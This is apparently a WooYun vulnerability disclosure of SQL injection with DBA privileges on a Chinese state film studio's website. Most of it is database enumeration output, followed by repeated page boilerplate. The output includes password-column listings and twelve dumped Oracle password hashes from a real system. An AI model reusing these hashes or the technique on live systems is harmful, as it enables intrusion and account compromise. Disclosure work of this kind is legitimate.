| DR$STOPLIST                    | 3       |
| DR$INDEX                       | 1       |
| DR$INDEX_SET                   | 1       |
+--------------------------------+---------+
Database: WMSYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| WM$HINT_TABLE                  | 58      |
| WM$SYSPARAM_ALL_VALUES         | 27      |
| WM$EVENTS_INFO                 | 12      |
| WM$WORKSPACE_PRIV_TABLE        | 8       |
| WM$ENV_VARS                    | 2       |
| AQ$_WM$EVENT_QUEUE_TABLE_S     | 1       |
| WM$NEXTVER_TABLE               | 1       |
| WM$VERSION_HIERARCHY_TABLE     | 1       |
| WM$WORKSPACES_TABLE            | 1       |
+--------------------------------+---------+
Database: SYSMAN
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| MGMT_METRICS_RAW               | 36835   |
| MGMT_METRICS_1HOUR             | 36786   |
| MGMT_METRICS_1DAY              | 4614    |
| MGMT_STRING_METRIC_HISTORY     | 4188    |
| MGMT_ARU_PRODUCT_RELEASE_MAP   | 4139    |
| MGMT_METRICS                   | 2583    |
| MGMT_SEVERITY                  | 1765    |
| MGMT_HC_OS_COMPONENTS          | 1524    |
| MGMT_HC_VENDOR_SW_COMPONENTS   | 1524    |
| MGMT_HC_VENDOR_SW_SUMMARY      | 1524    |
| MGMT_ARU_FAMILY_PRODUCT_MAP    | 1381    |
| MGMT_JOB_STEP_PARAMS           | 1215    |
| MGMT_SYSTEM_PERFORMANCE_LOG    | 795     |
| MGMT_ARU_PRODUCTS              | 611     |
| MGMT_HC_OS_PROPERTIES          | 515     |
| MGMT_ECM_SNAPSHOT_MD_COLUMNS   | 506     |
| MGMT_ARU_RELEASES              | 439     |
| MGMT_JOB_EXECPLAN              | 388     |
| MGMT_ARU_OUI_COMPONENTS        | 334     |
| MGMT_CURRENT_METRICS           | 306     |
| MGMT_DB_INIT_PARAMS_ECM        | 259     |
| MGMT_INV_DEPENDENCY_RULE       | 224     |
| MGMT_METRIC_THRESHOLDS         | 209     |
| MGMT_JOB_TYPE_DISPLAY_PARAM    | 176     |
| MGMT_JOB_PARAM_SOURCE          | 158     |
| MGMT_INV_COMPONENT             | 111     |
| MGMT_POLICY_RULE_DEF_COLUMNS   | 111     |
| MGMT_LAST_VIOLATION            | 110     |
| MGMT_TARGET_ROLLUP_TIMES       | 110     |
| MGMT_METRIC_COLLECTIONS        | 103     |
| MGMT_INV_VERSIONED_PATCH       | 79      |
| MGMT_ECM_SNAPSHOT_MD_TABLES    | 77      |
| MGMT_DB_FEATUREUSAGE           | 69      |
| MGMT_JOB_TYPE_URI_INFO         | 66      |
| MGMT_ARU_PLATFORMS             | 58      |
| MGMT_JOB_TYPE_INFO             | 55      |
| MGMT_POLICY_RULE               | 55      |
| MGMT_TARGET_PROPERTIES         | 46      |
| MGMT_POLICY_VIOLATION_VALUES   | 45      |
| MGMT_PERFORMANCE_NAMES         | 43      |
| MGMT_ARU_LANGUAGES             | 38      |
| MGMT_PURGE_POLICY_TARGET_STATE | 36      |
| MGMT_ECM_SNAPSHOT_METADATA     | 34      |
| MGMT_JOB_TYPE_DISPLAY_INFO     | 33      |
| MGMT_JOB_COMMAND               | 30      |
| MGMT_NOTIFY_RULE_CONFIGS       | 30      |
| MGMT_JOB_VALUE_PARAMS          | 28      |
| MGMT_TYPE_PROPERTIES           | 27      |
| ESM_COLLECTION                 | 26      |
| MGMT_NOTIFY_QUEUES             | 24      |
| MGMT_TARGET_TYPES              | 23      |
| MGMT_ECM_ARU_MAP               | 22      |
| MGMT_JOB_CRED_PARAMS           | 22      |
| MGMT_POLICY_VIOLATION_ROWS     | 21      |
| MGMT_METRICS_EXT               | 20      |
| MGMT_AVAILABILITY              | 19      |
| MGMT_METADATA_SETS             | 19      |
| MGMT_PRIVS                     | 19      |
| MGMT_CREDENTIAL_SET_COLUMNS    | 18      |
| MGMT_HC_IOCARD_DETAILS         | 18      |
| MGMT_POLICY_SNAPSHOT_CRITERIA  | 18      |
| MGMT_USER_FOLDERS              | 18      |
| MGMT_ECM_RESOURCES             | 14      |
| MGMT_TARGET_PROP_DEFS          | 14      |
| MGMT_JOB_PROP_PARAMS           | 13      |
| MGMT_METRIC_DEPENDENCY_DEF     | 13      |
| MGMT_LICENSABLE_TARGET_TYPES   | 12      |
| MGMT_PRIV_INCLUDES             | 12      |
| MGMT_PURGE_POLICY              | 12      |
| MGMT_METRIC_COLLECTIONS_REP    | 10      |
| MGMT_PRIV_GRANTS               | 10      |
| MGMT_DB_SGA_ECM                | 9       |
| MGMT_JOB_SINGLE_TARGET_TYPES   | 9       |
| MGMT_POLICY_TARGET_CRITERIA    | 9       |
| MGMT_CREDENTIAL_SETS           | 8       |
| MGMT_CREDENTIAL_TYPE_COLUMNS   | 8       |
| MGMT_DB_DATAFILES_ECM          | 8       |
| MGMT_DB_TABLESPACES_ECM        | 8       |
| MGMT_HC_CPU_DETAILS            | 8       |
| MGMT_TARGET_DELETE_EXCEPTIONS  | 8       |
| MGMT_OMS_PARAMETERS            | 7       |
| MGMT_POLICY_RULE_CRITERIA      | 7       |
| MGMT_POLICY_VIOLATIONS         | 7       |
| MGMT_PURGE_POLICY_GROUP        | 7       |
| MGMT_TARGET_DELETE_CALLBACKS   | 7       |
| MGMT_USER_TYPE_METRIC_PREFS    | 7       |
| MGMT_ECM_GEN_SNAPSHOT          | 6       |
| MGMT_JOB_SQL_PARAMS            | 6       |
| MGMT_NOTIFY_RULES              | 6       |
| MGMT_PARAMETERS                | 6       |
| MGMT_POLICY_GROUP              | 6       |
| MGMT_ADMIN_LICENSES            | 5       |
| MGMT_AVAILABILITY_MARKER       | 5       |
| MGMT_BLACKOUT_PROXY_TARGETS    | 5       |
| MGMT_CURRENT_AVAILABILITY      | 5       |
| MGMT_LICENSE_DEFINITIONS       | 5       |
| MGMT_TARGETS                   | 5       |
| MGMT_COLLECTION_PROPERTIES     | 4       |
| MGMT_CREATED_USERS             | 4       |
| MGMT_CREDENTIAL_TYPES          | 4       |
| MGMT_ECM_SNAP_COMPONENT_INFO   | 4       |
| MGMT_HC_NIC_DETAILS            | 4       |
| MGMT_JOB_NESTED_JOB_TARGETS    | 4       |
| MGMT_JOB_SEC_INFO              | 4       |
| MGMT_TARGET_TYPE_COMPONENT_MAP | 4       |
| MGMT_USER_CALLBACKS            | 4       |
| MGMT_USER_CONTEXT              | 4       |
| MGMT_CREDENTIALS2              | 3       |
| MGMT_DB_CONTROLFILES_ECM       | 3       |
| MGMT_DB_REDOLOGS_ECM           | 3       |
| MGMT_JOB_EXECUTION             | 3       |
| MGMT_JOB_HISTORY               | 3       |
| MGMT_JOB_SUBST_PARAMS          | 3       |
| MGMT_NOTIFY_PROFILES           | 3       |
| AQ$_MGMT_NOTIFY_QTABLE_S       | 2       |
| MGMT_CALLBACKS                 | 2       |
| MGMT_FAILOVER_CALLBACKS        | 2       |
| MGMT_HC_FS_MOUNT_DETAILS       | 2       |
| MGMT_INV_CONTAINER             | 2       |
| MGMT_JOB_PURGE_POLICIES        | 2       |
| MGMT_JOB_USER_PARAMS           | 2       |
| MGMT_LOGIN_ASSISTANTS          | 2       |
| MGMT_VERSIONS                  | 2       |
| MGMT_BLACKOUT_REASON           | 1       |
| MGMT_CREDENTIAL_TYPE_REF       | 1       |
| MGMT_CURRENT_SEVERITY          | 1       |
| MGMT_DB_DBNINSTANCEINFO_ECM    | 1       |
| MGMT_DB_HDM_METRIC_HELPER      | 1       |
| MGMT_DB_LICENSE_ECM            | 1       |
| MGMT_DB_RECTSSETTINGS_ECM      | 1       |
| MGMT_DB_ROLLBACK_SEGS_ECM      | 1       |
| MGMT_ECM_SNAPSHOT              | 1       |
| MGMT_EMD_PING                  | 1       |
| MGMT_EMD_PING_CHECK            | 1       |
| MGMT_HA_INFO_ECM               | 1       |
| MGMT_HA_MTTR                   | 1       |
| MGMT_HA_RMAN_CONFIG_ECM        | 1       |
| MGMT_HC_HARDWARE_MASTER        | 1       |
| MGMT_HC_OS_SUMMARY             | 1       |
| MGMT_HC_SYSTEM_SUMMARY         | 1       |
| MGMT_INV_PATCHSET              | 1       |
| MGMT_JOB                       | 1       |
| MGMT_JOB_EVENT                 | 1       |
| MGMT_JOB_EXEC_SUMMARY          | 1       |
| MGMT_JOB_PURGE_CRITERIA        | 1       |
| MGMT_JOB_PURGE_VALUES          | 1       |
| MGMT_JOB_SCHEDULE              | 1       |
| MGMT_LICENSES                  | 1       |
| MGMT_MASTER_CHANGED_CALLBACK   | 1       |
| MGMT_REBUILD_INDEXES           | 1       |
| MGMT_REPOS_TIME_COEFFICIENT    | 1       |
| MGMT_ROLE_GRANTS               | 1       |
| MGMT_ROLES                     | 1       |
| MGMT_SEC_INFO                  | 1       |
| MGMT_SPACE_METRICS             | 1       |
| MGMT_TARGET_ADD_CALLBACKS      | 1       |
| MGMT_TARGET_CREDENTIALS        | 1       |
| MGMT_USER_JOBS                 | 1       |
| MGMT_VIEW_USER_CREDENTIALS     | 1       |
+--------------------------------+---------+
columns LIKE 'PASS' were found in the following databases:
Database: SYS
Table: KU$_PROFILE_VIEW
[1 column]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| PASS_FUNC_NAME | VARCHAR2 |
+----------------+----------+
Database: SYS
Table: V_$SQL_WORKAREA_ACTIVE
[1 column]
+---------------+--------+
| Column        | Type   |
+---------------+--------+
| NUMBER_PASSES | NUMBER |
+---------------+--------+
Database: SYS
Table: EXU8USR
[1 column]
+--------+----------+
| Column | Type     |
+--------+----------+
| PASSWD | VARCHAR2 |
+--------+----------+
Database: SYS
Table: EXU8LNKU
[1 column]
+--------+----------+
| Column | Type     |
+--------+----------+
| PASSWD | VARCHAR2 |
+--------+----------+
Database: SYS
Table: KU$_DBLINK_VIEW
[2 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| PASSWORD  | VARCHAR2 |
| PASSWORDX | RAW      |
+-----------+----------+
Database: SYS
Table: GV_$SQL_WORKAREA_ACTIVE
[1 column]
+---------------+--------+
| Column        | Type   |
+---------------+--------+
| NUMBER_PASSES | NUMBER |
+---------------+--------+
Database: SYS
Table: V_$SQL_PLAN_STATISTICS_ALL
[3 columns]
+------------------------+--------+
| Column                 | Type   |
+------------------------+--------+
| ESTIMATED_ONEPASS_SIZE | NUMBER |
| MULTIPASSES_EXECUTIONS | NUMBER |
| ONEPASS_EXECUTIONS     | NUMBER |
+------------------------+--------+
Database: SYS
Table: LINK$
[2 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| PASSWORD  | VARCHAR2 |
| PASSWORDX | RAW      |
+-----------+----------+
Database: SYS
Table: DBA_USERS
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| PASSWORD | VARCHAR2 |
+----------+----------+
Database: SYS
Table: KU$_ROLE_VIEW
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| PASSWORD | VARCHAR2 |
+----------+----------+
Database: SYS
Table: DBA_HIST_SQL_WORKAREA_HSTGRM
[2 columns]
+------------------------+--------+
| Column                 | Type   |
+------------------------+--------+
| MULTIPASSES_EXECUTIONS | NUMBER |
| ONEPASS_EXECUTIONS     | NUMBER |
+------------------------+--------+
Database: SYS
Table: KU$_USER_VIEW
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| PASSWORD | VARCHAR2 |
+----------+----------+
Database: SYS
Table: KU$_PSW_HIST_LIST_VIEW
[2 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| PASSWORD      | VARCHAR2 |
| PASSWORD_DATE | DATE     |
+---------------+----------+
Database: SYS
Table: EXU8ROL
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| PASSWORD | VARCHAR2 |
+----------+----------+
Database: SYS
Table: DBA_ROLES
[1 column]
+-------------------+----------+
| Column            | Type     |
+-------------------+----------+
| PASSWORD_REQUIRED | VARCHAR2 |
+-------------------+----------+
Database: SYS
Table: GV_$PGATARGET_ADVICE_HISTOGRAM
[2 columns]
+-----------------------------+--------+
| Column                      | Type   |
+-----------------------------+--------+
| ESTD_MULTIPASSES_EXECUTIONS | NUMBER |
| ESTD_ONEPASS_EXECUTIONS     | NUMBER |
+-----------------------------+--------+
Database: SYS
Table: V_$PGA_TARGET_ADVICE_HISTOGRAM
[2 columns]
+-----------------------------+--------+
| Column                      | Type   |
+-----------------------------+--------+
| ESTD_MULTIPASSES_EXECUTIONS | NUMBER |
| ESTD_ONEPASS_EXECUTIONS     | NUMBER |
+-----------------------------+--------+
Database: SYS
Table: EXU10LNK
[4 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| AUTH_PASSWD  | VARCHAR2 |
| AUTH_PASSWDX | RAW      |
| PASSWD       | VARCHAR2 |
| PASSWDX      | RAW      |
+--------------+----------+
Database: SYS
Table: GV_$SQL_PLAN_STATISTICS_ALL
[3 columns]
+------------------------+--------+
| Column                 | Type   |
+------------------------+--------+
| ESTIMATED_ONEPASS_SIZE | NUMBER |
| MULTIPASSES_EXECUTIONS | NUMBER |
| ONEPASS_EXECUTIONS     | NUMBER |
+------------------------+--------+
Database: SYS
Table: V_$SQL_WORKAREA_HISTOGRAM
[2 columns]
+------------------------+--------+
| Column                 | Type   |
+------------------------+--------+
| MULTIPASSES_EXECUTIONS | NUMBER |
| ONEPASS_EXECUTIONS     | NUMBER |
+------------------------+--------+
Database: SYS
Table: EXU10LNKU
[4 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| AUTH_PASSWD  | VARCHAR2 |
| AUTH_PASSWDX | RAW      |
| PASSWD       | VARCHAR2 |
| PASSWDX      | RAW      |
+--------------+----------+
Database: SYS
Table: V_$SQL_WORKAREA
[3 columns]
+------------------------+--------+
| Column                 | Type   |
+------------------------+--------+
| ESTIMATED_ONEPASS_SIZE | NUMBER |
| MULTIPASSES_EXECUTIONS | NUMBER |
| ONEPASS_EXECUTIONS     | NUMBER |
+------------------------+--------+
Database: SYS
Table: GV_$SQL_WORKAREA_HISTOGRAM
[2 columns]
+------------------------+--------+
| Column                 | Type   |
+------------------------+--------+
| MULTIPASSES_EXECUTIONS | NUMBER |
| ONEPASS_EXECUTIONS     | NUMBER |
+------------------------+--------+
Database: SYS
Table: GV_$SQL_WORKAREA
[3 columns]
+------------------------+--------+
| Column                 | Type   |
+------------------------+--------+
| ESTIMATED_ONEPASS_SIZE | NUMBER |
| MULTIPASSES_EXECUTIONS | NUMBER |
| ONEPASS_EXECUTIONS     | NUMBER |
+------------------------+--------+
Database: SYS
Table: EXU8LNK
[1 column]
+--------+----------+
| Column | Type     |
+--------+----------+
| PASSWD | VARCHAR2 |
+--------+----------+
Database: SYS
Table: EXU9LNK
[2 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| AUTH_PASSWD | VARCHAR2 |
| PASSWD      | VARCHAR2 |
+-------------+----------+
Database: SYS
Table: USER_HISTORY$
[2 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| PASSWORD      | VARCHAR2 |
| PASSWORD_DATE | DATE     |
+---------------+----------+
Database: SYS
Table: EXU9LNKU
[2 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| AUTH_PASSWD | VARCHAR2 |
| PASSWD      | VARCHAR2 |
+-------------+----------+
Database: SYS
Table: EXU8PHS
[2 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| PASSWORD      | VARCHAR2 |
| PASSWORD_DATE | DATE     |
+---------------+----------+
Database: SYS
Table: USER_DB_LINKS
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| PASSWORD | VARCHAR2 |
+----------+----------+
Database: SYS
Table: WRH$_SQL_WORKAREA_HISTOGRAM
[2 columns]
+------------------------+--------+
| Column                 | Type   |
+------------------------+--------+
| MULTIPASSES_EXECUTIONS | NUMBER |
| ONEPASS_EXECUTIONS     | NUMBER |
+------------------------+--------+
Database: SYS
Table: USER$
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| PASSWORD | VARCHAR2 |
+----------+----------+
Database: SYS
Table: KU$_10_1_DBLINK_VIEW
[2 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| PASSWORD  | VARCHAR2 |
| PASSWORDX | RAW      |
+-----------+----------+
Database: SYS
Table: EXU8USRU
[1 column]
+--------+----------+
| Column | Type     |
+--------+----------+
| PASSWD | VARCHAR2 |
+--------+----------+
Database: SYSMAN
Table: MGMT_VIEW_USER_CREDENTIALS
[1 column]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| VIEW_PASSWORD | VARCHAR2 |
+---------------+----------+
Database: SYSMAN
Table: MGMT_RCVCAT_CONFIG
[1 column]
+-----------------+------+
| Column          | Type |
+-----------------+------+
| RCVCAT_PASSWORD | RAW  |
+-----------------+------+
Database: SYSMAN
Table: MGMT_BCN_TXN_HTTP
[1 column]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| AUTH_PASSWD | VARCHAR2 |
+-------------+----------+
Database: SYSMAN
Table: MGMT_ARU_CREDENTIALS
[1 column]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| ARU_PASSWORD | VARCHAR2 |
+--------------+----------+
Database: SYSMAN
Table: MGMT_OB_ADMIN_HOSTS
[1 column]
+-------------+------+
| Column      | Type |
+-------------+------+
| OB_PASSWORD | RAW  |
+-------------+------+
Database: SYS
Table: EXU8USR
[12 entries]
+------------------+
| PASSWD           |
+------------------+
| E8A8AF58845EBCF7 |
| 657F7A692694CFA0 |
| F894844C34402B67 |
| 867208234D721FD8 |
| DF02A496267DEE66 |
| invalid          |
| B35099733B1436C8 |
| anonymous        |
| 3DF26A8B17D0F29F |
| 4A3BA55E08595C81 |
| 433796C343EDA358 |
| 5511E44AC561181F |
+------------------+

修复方案：

上WAF。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-12-11 15:18

厂商回复：

CNVD确认并复现所述情况，已由CNVD通过网站公开联系渠道向其邮件通报，由其后续提供解决方案。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0158871

漏洞标题：中央新闻纪录电影制片厂（集团）新影网存在SQL注射漏洞（DBA权限）

相关厂商：中央新闻纪录电影制片厂（集团）

漏洞作者：路人甲

提交时间：2015-12-07 17:56

修复时间：2016-01-23 15:16

公开时间：2016-01-23 15:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0158871

漏洞标题：中央新闻纪录电影制片厂（集团） 新影网存在SQL注射漏洞（DBA权限）

相关厂商：中央新闻纪录电影制片厂（集团）

漏洞作者： 路人甲

提交时间：2015-12-07 17:56

修复时间：2016-01-23 15:16

公开时间：2016-01-23 15:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0158871"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞标题：中央新闻纪录电影制片厂（集团）新影网存在SQL注射漏洞（DBA权限）

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云